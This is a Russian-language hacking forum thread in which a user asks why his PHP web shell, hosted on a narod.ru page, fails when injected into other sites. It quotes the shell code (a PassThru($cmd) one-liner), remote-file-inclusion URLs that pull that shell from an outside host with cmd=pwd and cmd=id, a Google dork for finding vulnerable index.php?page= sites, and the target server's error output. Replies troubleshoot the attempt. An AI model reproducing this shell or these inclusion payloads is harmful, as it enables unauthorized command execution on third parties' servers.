shel.php
 

Здрасьте, sorry, что пишу не по теме, но! У меня есть файл с шелом на .народ.ру вот содержимое этого сайта
<?php echo "<pre>" ; PassThru($cmd) ; echo "</pre>"; echo "<?php echo "<pre>" ; PassThru($cmd) ; echo "</pre>"; echo "php shell by 310003102 haked by x32ph" ?> " ?>
По идее если сайт бажный, то он мне должен выдать
php shell by 310003102 haked by x32ph так вот, он мне выдает все это дело. Я пишу в адресной строке: http://www.XXX.xxx/index.php?page=ht....XXX.narod.ru/
shel.php&cmd=pwd почему он не выдает мне мои правыа??? Что я не так делаю?

Да, и еще! В поисковике я пишу allinurl: "index.php?page=news.php" что не так???

Вот на такой запрос /index.php?page=http://www.***.narod.ru/shel.php;&cmd=id
он мне выдал Warning: main(): Failed opening 'http://www.x32ph.narod.ru/666.php;' for inclusion (include_path='.') in /home/htdocs/web12/html/kerken/index.php on line 38

тсареешь =)) в гугле уже дааавно это всё пофиксили, терь этим не воспользуешься... это раз...
по поводу шела.. ты тооочно уверен, что возможно Sql-инъекция?
+ у тя ошибка в самом шеле...
+ он тебе НЕ выдаст то, что ты хочешь.. хакед бай Вася Пупкин... так как ты задаёшь ему параметр пвд.. он те теоретически должен выдать путь к тому, где находится данная страница, на которой ты выполняешь шелл-команды...

вроде всё так... могу ошибатся


ЗЫ: haCked пишется с буквой "с" =)

Эй, люди, подскажите тогда какой поисковит юзать! Да и че в шеле не так???

а я не понял почему ты после shel.php пишешь знак & , а не ?

А какая собственно разница & - так тож работает -)))